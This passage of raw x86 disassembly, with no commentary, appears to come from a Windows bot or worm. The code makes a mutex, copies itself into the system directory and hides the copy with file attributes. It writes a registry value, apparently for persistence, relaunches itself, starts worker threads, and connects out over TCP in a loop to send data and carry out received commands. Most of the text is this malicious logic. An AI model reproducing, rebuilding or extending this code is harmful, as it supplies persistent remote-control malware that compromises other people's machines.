jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F0AA: ; CODE XREF: sub_40EFF8+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_40F0E3
jz short loc_40F0DC
sub eax, 8ADh
jz short loc_40F10E
dec eax
dec eax
jz short loc_40F0D5
dec eax
jz short loc_40F0CE
dec eax
dec eax
jnz short loc_40F0F9
push 431390h
jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F0CE: ; CODE XREF: sub_40EFF8+C9�j
push 431368h
jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F0D5: ; CODE XREF: sub_40EFF8+C6�j
push 43134Ch
jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F0DC: ; CODE XREF: sub_40EFF8+BB�j
push 4312F0h
jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F0E3: ; CODE XREF: sub_40EFF8+B9�j
sub eax, 8CAh
jz short loc_40F115
sub eax, 17h
jz short loc_40F10E
sub eax, 25h
jz short loc_40F107
sub eax, 29h
jz short loc_40F100
loc_40F0F9: ; CODE XREF: sub_40EFF8+35�j
; sub_40EFF8+87�j ...
push 4312D0h
jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F100: ; CODE XREF: sub_40EFF8+FF�j
push 4312B0h
jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F107: ; CODE XREF: sub_40EFF8+FA�j
push 43129Ch
jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F10E: ; CODE XREF: sub_40EFF8+C2�j
; sub_40EFF8+F5�j
push 431278h
jmp short loc_40F11A
; ---------------------------------------------------------------------------
loc_40F115: ; CODE XREF: sub_40EFF8+F0�j
push 431258h
loc_40F11A: ; CODE XREF: sub_40EFF8+40�j
; sub_40EFF8+4A�j ...
push 44A480h
call sub_41795B
pop ecx
mov eax, 44A480h
pop ecx
retn
sub_40EFF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40F12C(DWORD lpMultiByteStr)
sub_40F12C proc near ; CODE XREF: sub_40FCA3+22C8�p
WideCharStr = byte ptr -718h
msgname = word ptr -318h
MultiByteStr = byte ptr -108h
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h ; cchWideChar
push [ebp+lpMultiByteStr] ; lpMultiByteStr
lea eax, [ebp+WideCharStr]
push eax ; lpWideCharStr
call sub_41A109
add esp, 0Ch
lea eax, [ebp+lpMultiByteStr]
mov esi, 108h
push eax ; nSize
lea eax, [ebp+MultiByteStr]
push eax ; lpBuffer
mov [ebp+lpMultiByteStr], esi
call GetComputerNameA ; GetComputerNameA
lea eax, [ebp+MultiByteStr]
push esi ; cchWideChar
push eax ; lpMultiByteStr
lea eax, [ebp+msgname]
push eax ; lpWideCharStr
call sub_41A109
lea eax, [ebp+WideCharStr]
push eax
call sub_41A0EC
add esp, 10h
add eax, eax
push eax ; buflen
lea eax, [ebp+WideCharStr]
push eax ; buf
lea eax, [ebp+msgname]
push 0 ; fromname
push eax ; msgname
push 0 ; servername
call NetMessageBufferSend
test eax, eax
jnz short loc_40F1BC
mov esi, 44A278h
push 43155Ch
push esi
call sub_41795B
pop ecx
pop ecx
jmp short loc_40F1E5
; ---------------------------------------------------------------------------
loc_40F1BC: ; CODE XREF: sub_40F12C+7A�j
lea ecx, [ebp+WideCharStr]
push ecx
lea ecx, [ebp+msgname]
push ecx
push eax
call sub_40EFF8
pop ecx
mov esi, 44A278h
push eax
push 431520h
push esi
call sub_41795B
add esp, 14h
loc_40F1E5: ; CODE XREF: sub_40F12C+8E�j
mov eax, esi
pop esi
leave
retn
sub_40F12C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F1EA proc near ; CODE XREF: .text:0041A42F�p
var_AD0 = dword ptr -0AD0h
CommandLine = byte ptr -0A90h
WSAData = WSAData ptr -98Ch
var_7FC = byte ptr -7FCh
var_6FC = byte ptr -6FCh
ValueName = byte ptr -5FCh
Parameter = byte ptr -4F8h
CurrentDirectory= byte ptr -3F4h
ExistingFileName= byte ptr -2F0h
ApplicationName = byte ptr -1ECh
Data = byte ptr -1E8h
StartupInfo = _STARTUPINFOA ptr -0E8h
var_A4 = byte ptr -0A4h
ProcessInformation= _PROCESS_INFORMATION ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
ThreadId = dword ptr -8
hKey = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0A90h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+ThreadId], ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], offset sub_40DF02
push [ebp+var_C]
push large dword ptr fs:0
mov large fs:0, esp
cmp dword ptr unk_4315F4, ebx
jz short loc_40F223
call sub_40B70C
loc_40F223: ; CODE XREF: sub_40F1EA+32�j
mov esi, GetTickCount
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword ptr byte_445EDC+0D403Ch, eax
call esi ; GetTickCount
push eax
call sub_4179AD
pop ecx
call sub_40A16C
push 2 ; uMode
call SetErrorMode ; SetErrorMode
push 7530h ; dwMilliseconds
push offset byte_4315F8 ; lpName
push ebx ; bInitialOwner
push ebx ; lpMutexAttributes
call CreateMutexA ; CreateMutexA
push eax ; hHandle
call WaitForSingleObject ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40F277
push 1
call dword ptr byte_424150
loc_40F277: ; CODE XREF: sub_40F1EA+83�j
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call WSAStartup_0
cmp eax, ebx
mov [ebp+var_C], eax
jnz loc_40F8CD
cmp byte ptr [ebp+WSAData.wVersion], 2
jnz loc_40F8C7
xor eax, eax
mov al, byte ptr [ebp+WSAData.wVersion+1]
cmp al, 2
jnz loc_40F8C7
mov esi, 104h
lea eax, [ebp+CurrentDirectory]
push esi ; uSize
push eax ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
lea eax, [ebp+ExistingFileName]
push esi
push eax
push ebx
call dword ptr byte_4240F8
push eax
call dword ptr byte_424084+4
lea eax, [ebp+var_6FC]
push eax
lea eax, [ebp+var_7FC]
push eax
push ebx
lea eax, [ebp+ExistingFileName]
push ebx
push eax
call sub_419B08
lea eax, [ebp+var_6FC]
push eax
lea eax, [ebp+var_7FC]
push eax
push 42AFB8h
lea eax, [ebp+Parameter]
push esi
push eax
call sub_417EDA
lea eax, [ebp+CurrentDirectory]
push eax
lea eax, [ebp+ExistingFileName]
push eax
call sub_417F60
add esp, 30h
mov esi, 431644h
test eax, eax
jnz loc_40F4E3
cmp dword ptr byte_445EDC+0D41A8h, ebx
jz short loc_40F372
push esi
xor edi, edi
call sub_4180D0
sub eax, 4
pop ecx
jz short loc_40F372
loc_40F34F: ; CODE XREF: sub_40F1EA+186�j
call sub_4179B7
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov [edi+431644h], dl
inc edi
call sub_4180D0
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_40F34F
loc_40F372: ; CODE XREF: sub_40F1EA+155�j
; sub_40F1EA+163�j
lea eax, [ebp+CurrentDirectory]
push esi
push eax
lea eax, [ebp+ApplicationName]
push 42D37Ch
push eax
call sub_41795B
add esp, 10h
lea eax, [ebp+ApplicationName]
push eax
call dword ptr byte_42409C+4
cmp eax, 0FFFFFFFFh
jz short loc_40F3B2
lea eax, [ebp+ApplicationName]
push 80h ; dwFileAttributes
push eax ; lpFileName
call SetFileAttributesA ; SetFileAttributesA
loc_40F3B2: ; CODE XREF: sub_40F1EA+1B4�j
mov edi, CopyFileA
mov [ebp+hKey], ebx
jmp short loc_40F3E4
; ---------------------------------------------------------------------------
loc_40F3BD: ; CODE XREF: sub_40F1EA+20D�j
call GetLastError
cmp [ebp+hKey], ebx
jnz short loc_40F3F9
cmp eax, 20h
jz short loc_40F3D2
cmp eax, 5
jnz short loc_40F3F9
loc_40F3D2: ; CODE XREF: sub_40F1EA+1E1�j
push 3A98h ; dwMilliseconds
mov [ebp+hKey], 1
call Sleep ; Sleep
loc_40F3E4: ; CODE XREF: sub_40F1EA+1D1�j
lea eax, [ebp+ApplicationName]
push ebx ; bFailIfExists
push eax ; lpNewFileName
lea eax, [ebp+ExistingFileName]
push eax ; lpExistingFileName
call edi ; CopyFileA
test eax, eax
jz short loc_40F3BD
loc_40F3F9: ; CODE XREF: sub_40F1EA+1DC�j
; sub_40F1EA+1E6�j
lea eax, [ebp+ApplicationName]
push eax
call sub_40B4BE
pop ecx
lea eax, [ebp+ApplicationName]
push 7 ; dwFileAttributes
push eax ; lpFileName
call SetFileAttributesA ; SetFileAttributesA
push 10h
lea eax, [ebp+ProcessInformation]
push ebx
push eax
call sub_4179E0
push 44h
lea eax, [ebp+StartupInfo]
pop edi
push edi
push ebx
push eax
call sub_4179E0
mov [ebp+StartupInfo.cb], edi
xor edi, edi
inc edi
add esp, 18h
mov [ebp+StartupInfo.lpTitle], 440F9Ch
mov [ebp+StartupInfo.dwFlags], edi
mov [ebp+StartupInfo.wShowWindow], bx
call GetCurrentProcessId ; GetCurrentProcessId
push eax ; dwProcessId
push edi ; bInheritHandle
push 100000h ; dwDesiredAccess
call OpenProcess ; OpenProcess
lea ecx, [ebp+ExistingFileName]
push ecx
push eax
lea eax, [ebp+ApplicationName]
push eax
lea eax, [ebp+CommandLine]
push 437388h
push eax
call sub_41795B
add esp, 14h
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
lea eax, [ebp+CurrentDirectory]
push eax ; lpCurrentDirectory
push ebx ; lpEnvironment
push 28h ; dwCreationFlags
push edi ; bInheritHandles
push ebx ; lpThreadAttributes
lea eax, [ebp+CommandLine]
push ebx ; lpProcessAttributes
push eax ; lpCommandLine
lea eax, [ebp+ApplicationName]
push eax ; lpApplicationName
call CreateProcessA ; CreateProcessA
test eax, eax
jz short loc_40F4E6
push 0C8h ; dwMilliseconds
call Sleep ; Sleep
push [ebp+ProcessInformation.hProcess]
mov esi, dword ptr byte_424074+4
call esi
push [ebp+ProcessInformation.hThread]
call esi
call WSACleanup_0
push ebx
call dword ptr byte_424150
loc_40F4E3: ; CODE XREF: sub_40F1EA+149�j
xor edi, edi
inc edi
loc_40F4E6: ; CODE XREF: sub_40F1EA+2CF�j
cmp dword ptr byte_445EDC+0D4400h, 2
jle short loc_40F535
mov eax, dword ptr byte_445EDC+0D4404h
push dword ptr [eax+4]
call sub_417ECF
pop ecx
mov [ebp+hKey], eax
push 0FFFFFFFFh ; dwMilliseconds
push eax ; hHandle
call WaitForSingleObject ; WaitForSingleObject
push [ebp+hKey]
call dword ptr byte_424074+4
mov eax, dword ptr byte_445EDC+0D4404h
cmp [eax+8], ebx
jz short loc_40F535
push 7D0h ; dwMilliseconds
call Sleep ; Sleep
mov eax, dword ptr byte_445EDC+0D4404h
push dword ptr [eax+8] ; lpFileName
call DeleteFileA ; DeleteFileA
loc_40F535: ; CODE XREF: sub_40F1EA+303�j
; sub_40F1EA+330�j
lea eax, [ebp+CurrentDirectory]
push esi
push eax
lea eax, [ebp+ValueName]
push 42D37Ch
push eax
call sub_41795B
add esp, 10h
cmp dword ptr unk_4315B4, ebx
jz short loc_40F56E
cmp dword ptr byte_445EDC+14h, ebx
jnz short loc_40F56E
lea eax, [ebp+Parameter]
push eax ; lpData
call sub_40CD17
pop ecx
loc_40F56E: ; CODE XREF: sub_40F1EA+36D�j
; sub_40F1EA+375�j
cmp dword ptr unk_4315C8, ebx
jz short loc_40F5E9
lea eax, [ebp+ValueName]
push 431664h
push eax
push 437378h
lea eax, [ebp+Data]
push 100h
push eax
call sub_417EDA
add esp, 14h
lea eax, [ebp+hKey]
push ebx ; lpdwDisposition
push eax ; phkResult
push ebx ; lpSecurityAttributes
push 0F003Fh ; samDesired
push ebx ; dwOptions
push ebx ; lpClass
push ebx ; Reserved
push offset SubKey ; lpSubKey
push 80000002h ; hKey
call RegCreateKeyExA ; RegCreateKeyExA
lea eax, [ebp+Data]
push eax
call sub_4180D0
pop ecx
push eax ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push edi ; dwType
lea eax, [ebp+ValueName]
push ebx ; Reserved
push eax ; lpValueName
push [ebp+hKey] ; hKey
call RegSetValueExA ; RegSetValueExA
push [ebp+hKey] ; hKey
call RegCloseKey ; RegCloseKey
loc_40F5E9: ; CODE XREF: sub_40F1EA+38A�j
lea eax, [ebp+var_A4]
push 4372D4h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_A4]
push ebx
push eax
call sub_41741F
lea eax, [ebp+var_A4]
push eax
call sub_40CB08
push 0B80h
push ebx
push 44AAE8h
call sub_4179E0
lea eax, [ebp+var_A4]
push 43729Ch
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_A4]
push edi
push eax
call sub_41741F
add esp, 38h
mov edi, eax
mov esi, CreateThread
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_416495 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov [edi+44B87Ch], eax
jnz short loc_40F688
call GetLastError
push eax
lea eax, [ebp+var_A4]
push 437248h
push eax
call sub_41795B
add esp, 0Ch
loc_40F688: ; CODE XREF: sub_40F1EA+481�j
lea eax, [ebp+var_A4]
push eax
call sub_40CB08
lea eax, [ebp+var_A4]
mov [esp+0AD0h+var_AD0], 43720Ch
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_A4]
push 1
push eax
call sub_41741F
add esp, 14h
mov edi, eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_417169 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov [edi+44B87Ch], eax
jnz short loc_40F6F5
call GetLastError
push eax
lea eax, [ebp+var_A4]
push 4371C0h
push eax
call sub_41795B
add esp, 0Ch
loc_40F6F5: ; CODE XREF: sub_40F1EA+4EE�j
lea eax, [ebp+var_A4]
push eax
call sub_40CB08
lea eax, [ebp+var_A4]
mov [esp+0AD0h+var_AD0], 437184h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_A4]
push 1
push eax
call sub_41741F
add esp, 14h
mov edi, eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+Parameter]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40CD88 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
imul edi, 234h
cmp eax, ebx
mov [edi+44B87Ch], eax
jnz short loc_40F768
call GetLastError
push eax
lea eax, [ebp+var_A4]
push 437138h
push eax
call sub_41795B
add esp, 0Ch
loc_40F768: ; CODE XREF: sub_40F1EA+561�j
lea eax, [ebp+var_A4]
push eax
call sub_40CB08
call sub_4179B7
push 7Fh
push 431620h
push 519F24h
mov dword ptr byte_445EDC+0D41B8h, ebx
call sub_419300
mov eax, dword ptr unk_431598
push 3Fh
mov edi, 519FA4h
push 431630h
push edi
mov dword ptr byte_445EDC+0D4198h, eax
call sub_419300
push 3Fh
mov esi, 519FE4h
push 43163Ch
push esi
call sub_419300
add esp, 28h
mov dword ptr byte_445EDC+0D419Ch, ebx
loc_40F7C7: ; CODE XREF: sub_40F1EA+683�j
; sub_40F1EA+68E�j ...
mov [ebp+hKey], ebx
loc_40F7CA: ; CODE XREF: sub_40F1EA+637�j
cmp dword ptr byte_445EDC+2Ch, ebx
jnz short loc_40F7E8
lea eax, [ebp+var_14]
push ebx
push eax
call InternetGetConnectedState ; InternetGetConnectedState
test eax, eax
jnz short loc_40F7E8
push 7530h
jmp short loc_40F814
; ---------------------------------------------------------------------------
loc_40F7E8: ; CODE XREF: sub_40F1EA+5E6�j
; sub_40F1EA+5F5�j
push (offset byte_445EDC+0D4044h) ; LPVOID
mov dword ptr byte_445EDC+0D41B4h, ebx
call sub_40F8D6
cmp eax, 2
mov [ebp+var_C], eax
jz loc_40F8C2
cmp dword ptr byte_445EDC+0D41B4h, ebx
jz short loc_40F80F
dec [ebp+hKey]
loc_40F80F: ; CODE XREF: sub_40F1EA+620�j
push 0BB8h ; dwMilliseconds
loc_40F814: ; CODE XREF: sub_40F1EA+5FC�j
call Sleep ; Sleep
inc [ebp+hKey]
cmp [ebp+hKey], 6
jl short loc_40F7CA
cmp [ebp+var_C], 2
jz loc_40F8C2
cmp [ebp+var_10], ebx
jz short loc_40F872
push 7Fh
push 431620h
push 519F24h
call sub_419300
mov eax, dword ptr unk_431598
push 3Fh
push 431630h
push edi
mov dword ptr byte_445EDC+0D4198h, eax
call sub_419300
push 3Fh
push 43163Ch
push esi
call sub_419300
add esp, 24h
mov [ebp+var_10], ebx
jmp loc_40F7C7
; ---------------------------------------------------------------------------
loc_40F872: ; CODE XREF: sub_40F1EA+646�j
cmp byte_445EDC+0D41ADh, bl
jz loc_40F7C7
push 7Fh
push 51A089h
push 519F24h
call sub_419300
mov eax, dword ptr unk_43159C
push 3Fh
push 51A08Ah
push edi
mov dword ptr byte_445EDC+0D4198h, eax
call sub_419300
push 3Fh
push 51A08Bh
push esi
call sub_419300
add esp, 24h
mov [ebp+var_10], 1
jmp loc_40F7C7
; ---------------------------------------------------------------------------
loc_40F8C2: ; CODE XREF: sub_40F1EA+614�j
; sub_40F1EA+63D�j
call sub_4175E2
loc_40F8C7: ; CODE XREF: sub_40F1EA+B1�j
; sub_40F1EA+C1�j
call WSACleanup_0
loc_40F8CD: ; CODE XREF: sub_40F1EA+A4�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40F1EA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_40F8D6(LPVOID)
sub_40F8D6 proc near ; CODE XREF: sub_40F1EA+609�p
; DATA XREF: sub_40FCA3+3BE8�o
Buffer = byte ptr -4B4h
tstrFilename = byte ptr -3B0h
Parameter = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = byte ptr -2A4h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_110 = dword ptr -110h
var_D0 = dword ptr -0D0h
var_90 = dword ptr -90h
hostshort = word ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = byte ptr -30h
name = sockaddr ptr -14h
ThreadId = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4B4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 59h
mov esi, eax
pop ecx
lea edi, [ebp+var_194]
xor ebx, ebx
rep movsd
mov [ebp+ThreadId], ebx
mov dword ptr [eax+160h], 1
loc_40F901: ; CODE XREF: sub_40F8D6+AB�j
; sub_40F8D6+21A�j ...
push 10h
lea eax, [ebp+name]
push ebx
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+var_190]
push eax ; name
call sub_40B862
cmp eax, ebx
pop ecx
mov dword ptr [ebp+name.sa_data+2], eax
jz loc_40FB20
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket_0
mov esi, eax
mov eax, [ebp+var_38]
imul eax, 234h
push 10h ; namelen
mov [eax+44B874h], esi
lea eax, [ebp+name]
push eax ; name
push esi ; s
call connect_0
cmp eax, 0FFFFFFFFh
jnz short loc_40F986
push esi ; s
call closesocket_0
call sub_40B88B
push 7D0h ; dwMilliseconds
loc_40F97B: ; CODE XREF: sub_40F8D6+22A�j
call Sleep ; Sleep
jmp loc_40F901
; ---------------------------------------------------------------------------
loc_40F986: ; CODE XREF: sub_40F8D6+92�j
push 1Ch
lea eax, [ebp+var_30]
push ebx
push eax
call sub_4179E0
push ebx
lea eax, [ebp+var_30]
push dword ptr unk_4315C4
push dword ptr unk_4315C0
push eax
push esi
call sub_41689B
push 1Bh
mov [ebp+arg_0], eax
push eax
mov eax, [ebp+var_38]
imul eax, 234h
add eax, 44B880h
push eax
call sub_419300
lea eax, [ebp+var_190]
push eax
push 4373DCh
call sub_40CB7C
add esp, 34h
cmp dword ptr unk_4315CC, ebx
jz loc_40FAB4
call sub_40BA1B
test eax, eax
jz loc_40FAB4
lea eax, [ebp+Buffer]
push 104h ; uSize
push eax ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+tstrFilename]
push 4373C4h
push eax
call sub_41795B
lea eax, [ebp+tstrFilename]
push eax ; lptstrFilename
call sub_40C738
mov edi, eax
add esp, 10h
cmp edi, ebx
jz loc_40FAB4
lea eax, [ebp+tstrFilename]
push 104h
push eax
lea eax, [ebp+var_2A4]
push eax
mov [ebp+Parameter], esi
mov [ebp+var_19C], ebx
call sub_419300
push ebx
push 0Bh
push 437394h
mov [ebp+var_1A0], edi
call sub_41741F
add esp, 18h
mov [ebp+var_2A8], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+Parameter]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40BAB1 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_2A8]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jz short loc_40FAB4
jmp short loc_40FAAC
; ---------------------------------------------------------------------------
loc_40FAA4: ; CODE XREF: sub_40F8D6+1DC�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_40FAAC: ; CODE XREF: sub_40F8D6+1CC�j
cmp [ebp+var_198], ebx
jz short loc_40FAA4
loc_40FAB4: ; CODE XREF: sub_40F8D6+107�j
; sub_40F8D6+114�j ...
push [ebp+var_3C] ; int
lea eax, [ebp+var_190]
push eax ; int
lea eax, [ebp+var_90]
push eax ; int
lea eax, [ebp+var_D0]
push [ebp+var_194] ; int
push [ebp+arg_0] ; int
push eax ; int
lea eax, [ebp+var_110]
push eax ; int
push esi ; s
call sub_40FB24
add esp, 20h
mov edi, eax
push esi ; s
call closesocket_0
cmp edi, ebx
jz loc_40F901
cmp edi, 1
jnz short loc_40FB05
push 0DBBA0h
jmp loc_40F97B
; ---------------------------------------------------------------------------
loc_40FB05: ; CODE XREF: sub_40F8D6+223�j
cmp edi, 2
jnz loc_40F901
push [ebp+var_38]
call sub_417735
pop ecx
push edi
pop eax
loc_40FB19: ; CODE XREF: sub_40F8D6+24C�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40FB20: ; CODE XREF: sub_40F8D6+5F�j
xor eax, eax
jmp short loc_40FB19
sub_40F8D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FB24(SOCKET s, int, int, int, int, int, int, int)
sub_40FB24 proc near ; CODE XREF: sub_40F8D6+207�p
var_1A0C = byte ptr -1A0Ch
var_A0C = byte ptr -0A0Ch
var_23C = dword ptr -23Ch
lpNewFileName = word ptr -19Ch
buf = byte ptr -9Ch
var_1C = byte ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
s = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
arg_10 = dword ptr 18h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A0Ch
call sub_417F30
push ebx
push esi
push edi
xor ebx, ebx
push 2
mov [ebp+var_8], ebx
lea eax, [ebp+lpNewFileName]
pop ecx
loc_40FB42: ; CODE XREF: sub_40FB24+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_40FB42
cmp byte_445EDC+0D41ACh, bl
jz short loc_40FB69
push 51A088h ; char
push 437424h ; int
push [ebp+s] ; s
call sub_40E190
add esp, 0Ch
loc_40FB69: ; CODE XREF: sub_40FB24+2E�j
push dword ptr [ebp+arg_C]
lea eax, [ebp+var_1C]
push ebx
push ebx
push 1
push eax
push [ebp+arg_10]
call sub_41689B
add esp, 14h
push eax
lea eax, [ebp+buf]
push dword ptr [ebp+arg_C]
push 437408h
push eax
call sub_41795B
add esp, 14h
lea eax, [ebp+buf]
push ebx ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
cmp eax, 0FFFFFFFFh
jnz short loc_40FBD6
push [ebp+s] ; s
call closesocket_0
push 1388h ; dwMilliseconds
call Sleep ; Sleep
loc_40FBCF: ; CODE XREF: sub_40FB24+DC�j
; sub_40FB24+156�j
xor eax, eax
loc_40FBD1: ; CODE XREF: sub_40FB24+172�j
; sub_40FB24+17A�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40FBD6: ; CODE XREF: sub_40FB24+95�j
; sub_40FB24+FB�j ...
mov esi, 1000h
lea eax, [ebp+var_1A0C]
push esi
push ebx
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+var_1A0C]
push ebx ; flags
push esi ; len
push eax ; buf
push [ebp+s] ; s
call recv_0
test eax, eax
jle short loc_40FBCF
lea eax, [ebp+var_A0C]
push eax
lea eax, [ebp+var_1A0C]
push eax
call sub_40B1B5
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
mov [ebp+arg_10], ebx
jle short loc_40FBD6
lea edi, [ebp+var_A0C]
loc_40FC27: ; CODE XREF: sub_40FB24+168�j
xor esi, esi
inc esi
loc_40FC2A: ; CODE XREF: sub_40FB24+147�j
push [ebp+arg_1C] ; int
lea eax, [ebp+var_8]
push esi ; int
push eax ; int
lea eax, [ebp+var_23C]
push eax ; int
lea eax, [ebp+lpNewFileName]
push eax ; lpNewFileName
push [ebp+arg_18] ; int
push dword ptr [ebp+arg_C] ; char
push [ebp+arg_8] ; int
push dword ptr [ebp+arg_4] ; char
push [ebp+s] ; s
push dword ptr [edi] ; addr
call sub_40FCA3
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_40FC6D
push 7D0h ; dwMilliseconds
call Sleep ; Sleep
jmp short loc_40FC2A
; ---------------------------------------------------------------------------
loc_40FC6D: ; CODE XREF: sub_40FB24+13A�j
cmp esi, 0FFFFFFFDh
jz short loc_40FC9B
cmp esi, 0FFFFFFFEh
jz short loc_40FC93
cmp esi, 0FFFFFFFFh
jz loc_40FBCF
inc [ebp+arg_10]
add edi, 4
mov eax, [ebp+arg_10]
cmp eax, [ebp+var_4]
jl short loc_40FC27
jmp loc_40FBD6
; ---------------------------------------------------------------------------
loc_40FC93: ; CODE XREF: sub_40FB24+151�j
xor eax, eax
inc eax
jmp loc_40FBD1
; ---------------------------------------------------------------------------
loc_40FC9B: ; CODE XREF: sub_40FB24+14C�j
push 2
pop eax
jmp loc_40FBD1
sub_40FB24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FCA3(int addr, SOCKET s, char, int, char, int, u_short lpNewFileName, int, int, int, int)
sub_40FCA3 proc near ; CODE XREF: sub_40FB24+12D�p
var_28A8 = dword ptr -28A8h
var_24A8 = byte ptr -24A8h
var_22A8 = byte ptr -22A8h
var_20A8 = byte ptr -20A8h
var_1FA8 = byte ptr -1FA8h
buf = byte ptr -1FA4h
var_1EA4 = dword ptr -1EA4h
var_1EA0 = dword ptr -1EA0h
var_1E9C = byte ptr -1E9Ch
var_1E1C = byte ptr -1E1Ch
var_1D9C = byte ptr -1D9Ch
var_1D1C = byte ptr -1D1Ch
var_1C9C = byte ptr -1C9Ch
var_1C1C = dword ptr -1C1Ch
var_1C18 = dword ptr -1C18h
var_1C14 = dword ptr -1C14h
var_1C10 = dword ptr -1C10h
var_1C0C = byte ptr -1C0Ch
var_1B8C = byte ptr -1B8Ch
var_1B0C = byte ptr -1B0Ch
var_1A8C = byte ptr -1A8Ch
var_1A0C = dword ptr -1A0Ch
var_1A08 = dword ptr -1A08h
var_1A04 = dword ptr -1A04h
var_1A00 = dword ptr -1A00h
var_19FC = dword ptr -19FCh
WSAData = WSAData ptr -19F8h
FileName = byte ptr -1868h
var_1864 = byte ptr -1864h
var_1764 = byte ptr -1764h
var_1760 = byte ptr -1760h
var_16E0 = byte ptr -16E0h
var_16A0 = byte ptr -16A0h
var_1610 = dword ptr -1610h
var_160C = dword ptr -160Ch
var_1608 = dword ptr -1608h
var_1604 = dword ptr -1604h
var_1600 = dword ptr -1600h
var_15FC = byte ptr -15FCh
var_15F8 = dword ptr -15F8h
var_15F4 = byte ptr -15F4h
var_1574 = byte ptr -1574h
var_14F8 = byte ptr -14F8h
var_1470 = byte ptr -1470h
var_13F4 = dword ptr -13F4h
var_13F0 = dword ptr -13F0h
var_13EC = dword ptr -13ECh
var_13E8 = byte ptr -13E8h
var_136C = dword ptr -136Ch
var_1368 = dword ptr -1368h
var_1364 = dword ptr -1364h
var_1360 = dword ptr -1360h
var_135C = dword ptr -135Ch
var_1354 = byte ptr -1354h
var_12D4 = byte ptr -12D4h
var_1254 = dword ptr -1254h
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1244 = dword ptr -1244h
var_1240 = dword ptr -1240h
var_123C = dword ptr -123Ch
var_1234 = dword ptr -1234h
var_1230 = byte ptr -1230h
var_11C0 = dword ptr -11C0h
var_11BC = byte ptr -11BCh
var_11B0 = byte ptr -11B0h
